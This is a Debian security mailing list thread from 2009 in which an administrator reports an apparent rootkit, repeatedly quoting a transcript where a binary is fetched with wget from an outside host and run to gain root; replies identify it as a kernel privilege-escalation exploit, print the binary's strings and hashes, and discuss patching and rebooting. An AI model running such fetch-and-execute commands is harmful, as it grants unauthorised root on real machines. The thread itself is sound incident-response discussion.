|
rootkit not found by rkhunter
I am running debian testing, 2.6.30 kernel.
I have a rootkit installed on a bunch of machines that rkhunter
does not find. This appears after infection with SHV4 / SHV5,
which rkhunter found.
Here it works to allow a non-root user to become root
krichel@fricka:~$ mkdir a
krichel@fricka:~$ cd a
krichel@fricka:~/a$ ls -l
total 0
krichel@fricka:~/a$ wget webmail.facill.com.br/a
--2009-10-04 07:47:42-- http://webmail.facill.com.br/aResolving webmail.facill.com.br... 201.65.241.194
Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6886 (6.7K) [text/plain]
Saving to: `a'
100%[======================================>] 6,886 6.88K/s in 1.0s
2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]
krichel@fricka:~/a$ chmod 777 a
krichel@fricka:~/a$ ./a
root@fricka:~/a#
Here is a situation where it does not work
krichel@chichek:~$ mkdir a
krichel@chichek:~$ cd a
krichel@chichek:~/a$ wget webmail.facill.com.br/a
--2009-10-04 07:31:15-- http://webmail.facill.com.br/aResolving webmail.facill.com.br... 201.65.241.194
Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6886 (6.7K) [text/plain]
Saving to: `a'
100%[======================================>] 6,886 37.8K/s in 0.2s
2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]
krichel@chichek:~/a$ chmod 777 a
krichel@chichek:~/a$ ./a
mmap: Permission denied
Does anybody here know how to delete this kit?
Cheers,
Thomas Krichel http://openlib.org/home/krichel RePEc:per:1965-06-05:thomas_krichel
skype: thomaskrichel
--
To UNSUBSCRIBE, email to debian-security-REQUEST@...
with a subject of "unsubscribe". Trouble? Contact listmaster@...
|
|
Re: rootkit not found by rkhunter
Thomas Krichel a écrit :
> I am running debian testing, 2.6.30 kernel.
>
> I have a rootkit installed on a bunch of machines that rkhunter
> does not find. This appears after infection with SHV4 / SHV5,
> which rkhunter found.
>
> Here it works to allow a non-root user to become root
>
> krichel@fricka:~$ mkdir a
> krichel@fricka:~$ cd a
> krichel@fricka:~/a$ ls -l
> total 0
> krichel@fricka:~/a$ wget webmail.facill.com.br/a
> --2009-10-04 07:47:42-- http://webmail.facill.com.br/a> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[======================================>] 6,886 6.88K/s in 1.0s
>
> 2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]
>
> krichel@fricka:~/a$ chmod 777 a
> krichel@fricka:~/a$ ./a
> root@fricka:~/a#
>
> Here is a situation where it does not work
>
> krichel@chichek:~$ mkdir a
> krichel@chichek:~$ cd a
> krichel@chichek:~/a$ wget webmail.facill.com.br/a
> --2009-10-04 07:31:15-- http://webmail.facill.com.br/a> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[======================================>] 6,886 37.8K/s in 0.2s
>
> 2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]
>
> krichel@chichek:~/a$ chmod 777 a
> krichel@chichek:~/a$ ./a
> mmap: Permission denied
>
>
> Does anybody here know how to delete this kit?
>
>
> Cheers,
>
> Thomas Krichel http://openlib.org/home/krichel> RePEc:per:1965-06-05:thomas_krichel
> skype: thomaskrichel
>
>
>
don't understand the difference between the both situations? ^^
--
To UNSUBSCRIBE, email to debian-security-REQUEST@...
with a subject of "unsubscribe". Trouble? Contact listmaster@...
|
|
Re: rootkit not found by rkhunter
On Sun, Oct 04, 2009 at 10:15:35AM -0400, Thomas Krichel wrote:
> I am running debian testing, 2.6.30 kernel.
This kernel lacks a few security fixes.
> I have a rootkit installed on a bunch of machines that rkhunter
> does not find. This appears after infection with SHV4 / SHV5,
> which rkhunter found.
Why do you think this is a rootkit?
Bastian
--
Leave bigotry in your quarters; there's no room for it on the bridge.
-- Kirk, "Balance of Terror", stardate 1709.2
--
To UNSUBSCRIBE, email to debian-security-REQUEST@...
with a subject of "unsubscribe". Trouble? Contact listmaster@...
|
|
Re: rootkit not found by rkhunter
On Sun, 4 Oct 2009 10:15:35 -0400 Thomas Krichel wrote:
> krichel@fricka:~/a$ chmod 777 a
> krichel@fricka:~/a$ ./a
> root@fricka:~/a#
...
> krichel@chichek:~/a$ chmod 777 a
> krichel@chichek:~/a$ ./a
> mmap: Permission denied
this looks like a standard privilege escalation (not a rootkit). it
appears to be using one of the recent null pointer dereference kernel
vulnerabilities. your fricka machine is probably running one of the
unpatched kernels ('uname -r' will tell you which version you are
currently running). chichek is up to date since it is preventing
the dereferenced pointer from accessing mmap.
'apt-get update && apt-get upgrade' followed by a reboot into the new
kernel should bring you up to date.
mike
--
To UNSUBSCRIBE, email to debian-security-REQUEST@...
with a subject of "unsubscribe". Trouble? Contact listmaster@...
|
|
Re: rootkit not found by rkhunter
On Sun, 4 Oct 2009 10:15:35 -0400
Thomas Krichel < krichel@...> wrote:
> I am running debian testing, 2.6.30 kernel.
>
> I have a rootkit installed on a bunch of machines that rkhunter
> does not find. This appears after infection with SHV4 / SHV5,
> which rkhunter found.
>
> Here it works to allow a non-root user to become root
>
> krichel@fricka:~$ mkdir a
> krichel@fricka:~$ cd a
> krichel@fricka:~/a$ ls -l
> total 0
> krichel@fricka:~/a$ wget webmail.facill.com.br/a
> --2009-10-04 07:47:42-- http://webmail.facill.com.br/a> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[======================================>] 6,886 6.88K/s
> in 1.0s
>
> 2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]
>
> krichel@fricka:~/a$ chmod 777 a
> krichel@fricka:~/a$ ./a
> root@fricka:~/a#
>
> Here is a situation where it does not work
>
> krichel@chichek:~$ mkdir a
> krichel@chichek:~$ cd a
> krichel@chichek:~/a$ wget webmail.facill.com.br/a
> --2009-10-04 07:31:15-- http://webmail.facill.com.br/a> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[======================================>] 6,886 37.8K/s
> in 0.2s
>
> 2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]
>
> krichel@chichek:~/a$ chmod 777 a
> krichel@chichek:~/a$ ./a
> mmap: Permission denied
>
>
> Does anybody here know how to delete this kit?
>
>
> Cheers,
>
> Thomas Krichel http://openlib.org/home/krichel> RePEc:per:1965-06-05:thomas_krichel
> skype: thomaskrichel
This file should at least be deleted from the host.
fgeek@foo:~$ file a
a: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not
stripped
fgeek@foo:~$ strings a
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
socket
exit
execl
ftruncate
perror
sendfile
unlink
mkstemp
mmap
getpagesize
getgid
getuid
__libc_start_main
GLIBC_2.1
GLIBC_2.0
PTRh
([^_]
[^_]
mmap
socket
mkstemp
unlink
ftruncate
/bin/sh
/tmp/tmp.XXXXXX
fgeek@foo:~$ md5sum a
b950af01be61a8cbf5d479430738bd18 a
fgeek@foo:~$ sha1sum a
639536caea56554406106ad8679115971485f3a2 a
--
To UNSUBSCRIBE, email to debian-security-REQUEST@...
with a subject of "unsubscribe". Trouble? Contact listmaster@...
|
|
Re: rootkit not found by rkhunter
Michael S Gilbert writes
> this looks like a standard privilege escalation (not a rootkit). it
> appears to be using one of the recent null pointer dereference kernel
> vulnerabilities. your fricka machine is probably running one of the
> unpatched kernels ('uname -r' will tell you which version you are
> currently running). chichek is up to date since it is preventing
> the dereferenced pointer from accessing mmap.
Hmmmm, here is a of machines affected and unaffected, with
their kernel version
affected
fricka 2.6.26-2-686
wotan 2.6.30-1-686
raneb 2.6.22-3-686
loge 2.6.26-2-686
trabbi 2.6.26-2-686
mutabor 2.6.26-2-686
not affected
khufu 2.6.30-1-686
chichek 2.6.30-1-686
nebka 2.6.26-2-686
sahure 2.6.30-1-amd64
snefru 2.6.30-1-686
On Tuesday I replaced all but /root /etc /var and /home on wotan,
which was the machine that has the SHV4/SHV5. It runs the latest
kernel. A cracker came in as a non-priviledged user without deleting
his history, that's how I found out how become got root. I spotted the
break from root's deleted .bash_history and the user he got in as
from /var/log/auth.log.
It looks like the affected machines run older kernels, so
I will follow your advice and upgrade.
Thanks and cheers,
Thomas Krichel http://openlib.org/home/krichel RePEc:per:1965-06-05:thomas_krichel
skype: thomaskrichel
--
To UNSUBSCRIBE, email to debian-security-REQUEST@...
with a subject of "unsubscribe". Trouble? Contact listmaster@...
|
|
Re: rootkit not found by rkhunter
Michael S Gilbert writes
> 'apt-get update && apt-get upgrade' followed by a reboot into the new
> kernel should bring you up to date.
Since I just download the kernel last week I did not really
believe your advice but I have rebooted and the problem appears
gone!
Cheers,
Thomas Krichel http://openlib.org/home/krichel RePEc:per:1965-06-05:thomas_krichel
skype: thomaskrichel
--
To UNSUBSCRIBE, email to debian-security-REQUEST@...
with a subject of "unsubscribe". Trouble? Contact listmaster@...
|
|
Re: rootkit not found by rkhunter
On Sun, Oct 04, 2009 at 11:44:52AM -0400, Thomas Krichel wrote:
> > this looks like a standard privilege escalation (not a rootkit). it
> > appears to be using one of the recent null pointer dereference kernel
> > vulnerabilities. your fricka machine is probably running one of the
> > unpatched kernels ('uname -r' will tell you which version you are
> > currently running). chichek is up to date since it is preventing
> > the dereferenced pointer from accessing mmap.
>
> Hmmmm, here is a of machines affected and unaffected, with
> their kernel version
>
> affected
> fricka 2.6.26-2-686
...
The kernel version reported by uname is not enough to determine the
security status of the kernel. The kernel version number only changes
when the kernel ABI changes. Security updates are often applied
without ABI bumps. For example, kernel 2.6.26-2-686 was introduced by
linux 2.6.26-14. However, the current version is 2.6.26-19. Several
securty fixes were introduced in the various releases between those two
versions, yet the version reported by uname was unchanged. You need to
make sure that the machine actually gets rebooted when security updates
are made.
AFAIK, the best way to know if you're running a stale kernel is to
compare the uptime of the machine against the mtime of the actual kernel
(using, e.g. "stat /boot/vmlinuz-2.6.26-2-686"). If the uptime of the
machine places the last reboot sometime before the kernel was updated,
you're not up to date. If there's a better way to test this, I'd love
to know about it.
noah
|
|
Re: rootkit not found by rkhunter
On Sun, 4 Oct 2009 12:10:04 -0400
Thomas Krichel < krichel@...> wrote:
> Michael S Gilbert writes
>
> > 'apt-get update && apt-get upgrade' followed by a reboot into the
> > new kernel should bring you up to date.
>
> Since I just download the kernel last week I did not really
> believe your advice but I have rebooted and the problem appears
> gone!
>
>
> Cheers,
>
> Thomas Krichel http://openlib.org/home/krichel> RePEc:per:1965-06-05:thomas_krichel
> skype: thomaskrichel
You should use apticron and apt-dater.
---
Henri Salo
--
To UNSUBSCRIBE, email to debian-security-REQUEST@...
with a subject of "unsubscribe". Trouble? Contact listmaster@...
|
|
Re: rootkit not found by rkhunter
On Sun, 4 Oct 2009 11:44:52 -0400 Thomas Krichel wrote:
> It looks like the affected machines run older kernels, so
> I will follow your advice and upgrade.
i forgot to mention that 'uname -r' won't actually tell you whether you
are running the most up-to-date debian kernel. to do that, look at the
output of 'dpkg -l | grep linux-image-$(uname -r)'. you should have
2.6.30-8 or higher for sid and 2.6.26-19 or higher for lenny (not sure
where your 2.6.22 version came from, but i would recommend installing
an official kernel package instead of that one; otherwise you have no
security support at all).
mike
--
To UNSUBSCRIBE, email to debian-security-REQUEST@...
with a subject of "unsubscribe". Trouble? Contact listmaster@...
|
|
Re: rootkit not found by rkhunter
On Sun, 4 Oct 2009 12:10:04 -0400 Thomas Krichel wrote:
> Michael S Gilbert writes
>
> > 'apt-get update && apt-get upgrade' followed by a reboot into the new
> > kernel should bring you up to date.
>
> Since I just download the kernel last week I did not really
> believe your advice but I have rebooted and the problem appears
> gone!
right, kernel updates do not apply until after reboot. the latest
kernel images no longer warn about this, which has lead to an increased
number of users opting not to reboot after upgrade (at least from
the volume of similar resolutions to postings on this list recently).
kernel team, would it be possible to get this warning reintroduced or
added to the notification daemon? we want to keep users informed about
the actions they need to take to stay secure, right?
mike
--
To UNSUBSCRIBE, email to debian-security-REQUEST@...
with a subject of "unsubscribe". Trouble? Contact listmaster@...
|
|
Re: rootkit not found by rkhunter
On 2009-10-04 19:10, Noah Meyerhans wrote:
> On Sun, Oct 04, 2009 at 11:44:52AM -0400, Thomas Krichel wrote:
>
>>> this looks like a standard privilege escalation (not a rootkit). it
>>> appears to be using one of the recent null pointer dereference kernel
>>> vulnerabilities. your fricka machine is probably running one of the
>>> unpatched kernels ('uname -r' will tell you which version you are
>>> currently running). chichek is up to date since it is preventing
>>> the dereferenced pointer from accessing mmap.
>>>
>> Hmmmm, here is a of machines affected and unaffected, with
>> their kernel version
>>
>> affected
>> fricka 2.6.26-2-686
>>
> ...
>
> The kernel version reported by uname is not enough to determine the
> security status of the kernel. The kernel version number only changes
> when the kernel ABI changes. Security updates are often applied
> without ABI bumps. For example, kernel 2.6.26-2-686 was introduced by
> linux 2.6.26-14. However, the current version is 2.6.26-19. Several
> securty fixes were introduced in the various releases between those two
> versions, yet the version reported by uname was unchanged.
Why is not EXTRAVERSION updated during the kernel package build?
Best regards,
--Edwin
--
To UNSUBSCRIBE, email to debian-security-REQUEST@...
with a subject of "unsubscribe". Trouble? Contact listmaster@...
|
|
Re: rootkit not found by rkhunter
On Sun, Oct 04, 2009 at 07:35:53PM +0300, Török Edwin wrote:
>
> Why is not EXTRAVERSION updated during the kernel package build?
>
EXTRAVERSION indicates the ABI version number. It's only updated when
that changes, in order to indicate that the new kernel is not compatible
with the old one and that external modules (e.g. the ati or nvidia
graphics drivers) need to be rebuilt.
noah
|
|
Re: rootkit not found by rkhunter
> AFAIK, the best way to know if you're running a stale kernel is to
> compare the uptime of the machine against the mtime of the actual kernel
> (using, e.g. "stat /boot/vmlinuz-2.6.26-2-686"). If the uptime of the
> machine places the last reboot sometime before the kernel was updated,
> you're not up to date. If there's a better way to test this, I'd love
> to know about it.
Comparing the outputs of:
sed -n 's/[^(]*(Debian \([^)]*\)).*/\1/p' /proc/version
and:
dpkg -s $(dpkg -S $(readlink /vmlinuz) | cut -d: -f1) |
awk '/^Version: / {print $2}'
has worked well for me - thanks to the kernel team for including the
version and revision!
Mark.
--
To UNSUBSCRIBE, email to debian-security-REQUEST@...
with a subject of "unsubscribe". Trouble? Contact listmaster@...
|
|
Re: rootkit not found by rkhunter
* Noah Meyerhans:
> AFAIK, the best way to know if you're running a stale kernel is to
> compare the uptime of the machine against the mtime of the actual kernel
> (using, e.g. "stat /boot/vmlinuz-2.6.26-2-686"). If the uptime of the
> machine places the last reboot sometime before the kernel was updated,
> you're not up to date. If there's a better way to test this, I'd love
> to know about it.
What about /proc/version? If the version stored in it is incorrect,
we should really fix that.
--
To UNSUBSCRIBE, email to debian-security-REQUEST@...
with a subject of "unsubscribe". Trouble? Contact listmaster@...
|
|
Re: rootkit not found by rkhunter
On Sun, Oct 04, 2009 at 12:16:14PM -0400, Michael S Gilbert wrote:
> On Sun, 4 Oct 2009 11:44:52 -0400 Thomas Krichel wrote:
> > It looks like the affected machines run older kernels, so
> > I will follow your advice and upgrade.
>
> i forgot to mention that 'uname -r' won't actually tell you whether you
> are running the most up-to-date debian kernel. to do that, look at the
> output of 'dpkg -l | grep linux-image-$(uname -r)'.
cat /proc/version is nice because it is the running kernel, and
includes the package version.
> you should have
> 2.6.30-8 or higher for sid and 2.6.26-19 or higher for lenny (not sure
> where your 2.6.22 version came from, but i would recommend installing
> an official kernel package instead of that one; otherwise you have no
> security support at all).
>
> mike
>
>
--
dann frazier
--
To UNSUBSCRIBE, email to debian-security-REQUEST@...
with a subject of "unsubscribe". Trouble? Contact listmaster@...
|
|
running vs. installed kernel (was: rootkit not found by rkhunter)
On Mon, 05 Oct 2009, dann frazier wrote:
> On Sun, Oct 04, 2009 at 12:16:14PM -0400, Michael S Gilbert wrote:
> > On Sun, 4 Oct 2009 11:44:52 -0400 Thomas Krichel wrote:
> > > It looks like the affected machines run older kernels, so
> > > I will follow your advice and upgrade.
> >
> > i forgot to mention that 'uname -r' won't actually tell you whether you
> > are running the most up-to-date debian kernel. to do that, look at the
> > output of 'dpkg -l | grep linux-image-$(uname -r)'.
>
> cat /proc/version is nice because it is the running kernel, and
> includes the package version.
Also, maybe
http://git.debian.org/?p=mirror/dsa-nagios.git;a=blob;f=dsa-nagios-checks/checks/dsa-check-running-kernel;hb=HEADmight be useful for some.
I don't claim it works in all the cases, or finds every weird
combination out there, but it seems to do a pretty good job of helping
us not forget to reboot systems.
I'm sure the interested parties can butcher it for parts if they don't
want all it does (i.e. maybe not everyone wants the get_avail magic).
Cheers,
weasel
--
| .''`. ** Debian GNU/Linux **
Peter Palfrader | : :' : The universal
http://www.palfrader.org/ | `. `' Operating System
| `- http://www.debian.org/--
To UNSUBSCRIBE, email to debian-security-REQUEST@...
with a subject of "unsubscribe". Trouble? Contact listmaster@...
|
|
Re: rootkit not found by rkhunter
Hi,
Mark van Walraven < markv@...> wrote:
>> AFAIK, the best way to know if you're running a stale kernel is to
>> compare the uptime of the machine against the mtime of the actual kernel
>> (using, e.g. "stat /boot/vmlinuz-2.6.26-2-686"). If the uptime of the
>> machine places the last reboot sometime before the kernel was updated,
>> you're not up to date. If there's a better way to test this, I'd love
>> to know about it.
>
> Comparing the outputs of:
>
> sed -n 's/[^(]*(Debian \([^)]*\)).*/\1/p' /proc/version
>
> and:
>
> dpkg -s $(dpkg -S $(readlink /vmlinuz) | cut -d: -f1) |
> awk '/^Version: / {print $2}'
>
> has worked well for me - thanks to the kernel team for including the
> version and revision!
Does someone know, if rkhunter has such a check?
Bye, Jörg.
--
Unsere Zweifel sind Verräter und oft genug verspielen wir den möglichen
Gewinn, weil wir den Versuch nicht wagen.
--
To UNSUBSCRIBE, email to debian-security-REQUEST@...
with a subject of "unsubscribe". Trouble? Contact listmaster@...
|
|
Re: rootkit not found by rkhunter
Hello Noah,
Noah Meyerhans < frodo@...> wrote:
> You need to make sure that the machine actually gets rebooted when
> security updates are made.
I thought for security fixes in modules it's enough to update/replace
the module. Isn't it?
Bye, Jörg.
--
NetBSD ist für Frauen: es läuft auf Waschmaschinen
--
To UNSUBSCRIBE, email to debian-security-REQUEST@...
with a subject of "unsubscribe". Trouble? Contact listmaster@...
|
|
Re: running vs. installed kernel
|
signature.asc (196 bytes) 